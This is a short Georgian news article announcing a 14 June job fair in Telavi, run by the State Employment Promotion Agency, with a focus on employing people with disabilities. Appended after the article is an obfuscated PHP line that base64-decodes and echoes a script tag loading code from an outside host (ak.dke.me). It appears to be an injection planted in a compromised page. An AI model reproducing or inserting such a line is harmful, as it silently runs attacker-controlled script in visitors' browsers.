celsiusi
ავერსი საქკაბელი

 დასაქმების ხელშეწყობის სახელმწიფო სააგენტოს ორგანიზებით 14 ივნისს თელავში დასაქმების ფორუმი გაიმართება. ამის შესახებ ინფორმაციას ჯანდაცვის სამინისტრო ავრცელებს.

სამინისტროს ინფორმაციით, ღონისძიების ფარგლებში 20-ზე მეტი კომპანია იქნება წარმოდგენილი, რომელსაც რეგიონში მიმდინარე ეტაპზე აქტიური ვაკანსიები აქვს. ღონისძიებაზე დასწრება თავისუფალია და მასში მონაწილეობა ნებისმიერ მსურველს შეუძლია.

„14 ივნისი შეზღუდული შესაძლებლობების მქონე პირთა უფლებების დაცვის დღეა. ამ თარიღთან დაკავშირებით თელავის დასაქმების ფორუმზე ყურადღება გამახვილდება შშმ და სსმ პირთა დასაქმებასა და ინტეგრირებაზე.

დასაქმების ფორუმის პარალელურად, ადგილობრივი სოციალური საწარმოებისა და პროფესიული კოლეჯების ნაწარმის გამოფენა-გაყიდვაც გაიმართება.

ღონისძიება თელავის ისტორიულ მუზეუმში 14:00 საათზე დაიწყება და 16:00 საათამდე გაგრძელდება.

თელავის დასაქმების ფორუმი კახეთის სახელმწიფო რწმუნებულის ადმინისტრაციისა და თელავის მუნიციპალიტეტის მერიასთან თანამშრომლობით იმართება.

დასაქმების ხელშეწყობის სახელმწიფო სააგენტო ფორუმებს, მოქალაქეთა დასაქმებისა და ეკონომიკური აქტივობების ხელშეწყობის მიზნით საქართველოს სხვადასხვა რეგიონში ყოველთვიურად მართავს. შემდეგ ღონისძიებას ივნისის თვეში აჭარა უმასპინძლებს“,- აღნიშნულია ინფორმაციაში.

143
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");